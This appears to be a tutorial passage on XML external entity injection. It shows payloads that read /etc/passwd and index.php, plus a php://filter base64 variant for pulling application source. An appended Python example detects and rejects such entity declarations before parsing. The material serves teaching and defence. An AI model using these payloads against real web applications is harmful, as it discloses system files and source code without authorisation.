Read sensitive files

Let's define an external XML entity:

<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///etc/passwd">
]>
&company;

In certain Java web applications, we may also specify a directory.

Reading source code

Another benefit of local file disclosure is the ability to obtain the source code of the web application.

<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///index.php">
]>

The request can execute successfully, but we may not see any result: the file we are referencing is not in a proper XML format, so it fails to be referenced as an external XML entity.

In this case we can use a PHP filter wrapper, which base64-encodes the file before it is included:

<!DOCTYPE email [
  <!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
&file;
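
A defensive counterpart to the payloads above, as an added example that is not part of the original page: a pre-parse gate that uses Python's expat bindings to list every external entity a request body declares, without resolving any of them. The function names, the sample bodies and the `<email>` element wrapped around the page's entity declarations are assumptions made for the example.

```python
import xml.parsers.expat
from urllib.parse import urlsplit


def external_entities(body: bytes):
    """Return (found, well_formed); found is [(name, scheme, system_id)].

    No ExternalEntityRefHandler is installed, so expat records the
    declarations but never opens the file or URL they point to.
    """
    found = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:  # SYSTEM or PUBLIC identifier => external entity
            found.append((name, urlsplit(system_id).scheme.lower(), system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(body, True)
        well_formed = True
    except xml.parsers.expat.ExpatError:
        well_formed = False  # keep whatever was declared before the error
    return found, well_formed


def screen(body: bytes) -> str:
    """Verdict for one request body: reject any external entity declaration."""
    found, well_formed = external_entities(body)
    if found:
        listed = ", ".join(f"{name} -> {scheme or 'relative'}" for name, scheme, _ in found)
        return "reject: external entity " + listed
    if not well_formed:
        return "reject: malformed XML"
    return "accept"


# Constructed request bodies; the entity declarations are the ones shown on this page.
PASSWD = (b'<!DOCTYPE email [\n  <!ENTITY company SYSTEM "file:///etc/passwd">\n]>\n'
          b'<email>&company;</email>')
PHP_FILTER = (b'<!DOCTYPE email [\n  <!ENTITY file SYSTEM '
              b'"php://filter/convert.base64-encode/resource=index.php">\n]>\n'
              b'<email>&file;</email>')
BENIGN = b'<email>user@example.com</email>'
BROKEN = b'<email>unterminated'

if __name__ == "__main__":
    for sample in (PASSWD, PHP_FILTER, BENIGN, BROKEN):
        print(screen(sample))
```

The gate rejects on the declaration alone, so it catches the base64 filter variant as well as the plain `file://` one, whether or not the entity is ever referenced in the body.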
